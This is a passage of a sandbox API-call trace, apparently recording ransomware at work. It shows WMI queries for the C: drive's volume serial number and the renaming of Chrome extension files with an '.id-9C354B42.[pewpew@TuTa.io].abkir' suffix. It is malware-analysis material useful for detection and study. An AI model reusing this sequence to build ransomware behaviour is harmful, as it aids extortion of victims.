[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0209.534] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0209.534] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0209.534] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.535] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x6027470) returned 0x0 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027470, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0209.535] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027470, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x6031510) returned 0x0 [0209.535] WbemDefPath:IUnknown:Release (This=0x6027470) returned 0x0 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x6031510) returned 0x0 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0209.535] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0xbdf0e0) returned 0x0 [0209.535] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf0e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.535] WbemDefPath:IUnknown:Release (This=0xbdf0e0) returned 0x3 [0209.535] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0209.535] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0209.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0209.535] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0209.535] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0209.535] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0209.536] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0209.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x6031510) returned 0x0 [0209.536] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0209.536] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0209.536] WbemDefPath:IWbemPath:SetText (This=0x6031510, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0209.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0209.536] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0209.536] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.536] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0209.536] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0209.536] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0209.536] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.536] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x6024a88) returned 0x0 [0209.536] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0209.537] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024a88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027480) returned 0x0 [0209.537] WbemLocator:IUnknown:Release (This=0x6024a88) returned 0x0 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027480) returned 0x0 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0209.537] WbemLocator:IUnknown:AddRef (This=0x6027480) returned 0x3 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0209.537] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0209.537] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0209.537] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x2 [0209.537] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x1 [0209.537] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0209.537] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0209.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027480) returned 0x0 [0209.537] WbemLocator:IUnknown:AddRef (This=0x6027480) returned 0x3 [0209.537] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x2 [0209.537] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0209.537] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0209.537] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.537] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x6027490) returned 0x0 [0209.537] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027490, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x60331bc) returned 0x0 [0209.841] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5ae64) returned 0x0 [0209.842] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ae64, pProxy=0x60331bc, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0209.842] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x1 [0209.842] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5ae84) returned 0x0 [0209.842] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5ae64) returned 0x0 [0209.842] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ae64, pProxy=0x60331bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.842] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x2 [0209.842] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0209.842] CoTaskMemFree (pv=0xbd4a38) [0209.842] WbemLocator:IUnknown:Release (This=0x6027490) returned 0x0 [0209.842] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5ae84) returned 0x0 [0209.843] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0209.843] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0209.843] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0209.843] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0209.844] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0209.844] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5ade4) returned 0x0 [0209.844] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ade4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.844] WbemLocator:IUnknown:Release (This=0xb5ade4) returned 0x3 [0209.844] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0209.844] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0209.844] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5ae6c) returned 0x0 [0209.845] WbemLocator:IRpcOptions:Query (in: This=0xb5ae6c, pPrx=0xb5ae84, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0209.845] WbemLocator:IUnknown:Release (This=0xb5ae6c) returned 0x3 [0209.845] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0209.845] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0209.845] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0209.845] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x60331bc) returned 0x0 [0209.845] WbemLocator:IUnknown:AddRef (This=0x60331bc) returned 0x4 [0209.845] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x3 [0209.845] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x2 [0209.845] SysStringLen (param_1=0x0) returned 0x0 [0209.845] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0209.845] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0209.845] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.845] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0209.845] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0209.845] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5ae84) returned 0x0 [0209.845] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x3 [0209.845] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0209.845] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0209.845] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.846] IWbemServices:GetObject (in: This=0x60331bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x6028180, ppCallResult=0x0) returned 0x0 [0209.920] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0209.921] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0209.921] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.921] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3678e08*=0, plFlavor=0x3678e0c*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3678e08*=8, plFlavor=0x3678e0c*=0) returned 0x0 [0209.921] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.921] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.921] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3678e08*=8, plFlavor=0x3678e0c*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3678e08*=8, plFlavor=0x3678e0c*=0) returned 0x0 [0209.921] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.921] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0209.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e908) returned 1 [0209.921] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x368df3a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0209.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0209.922] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0209.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0209.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 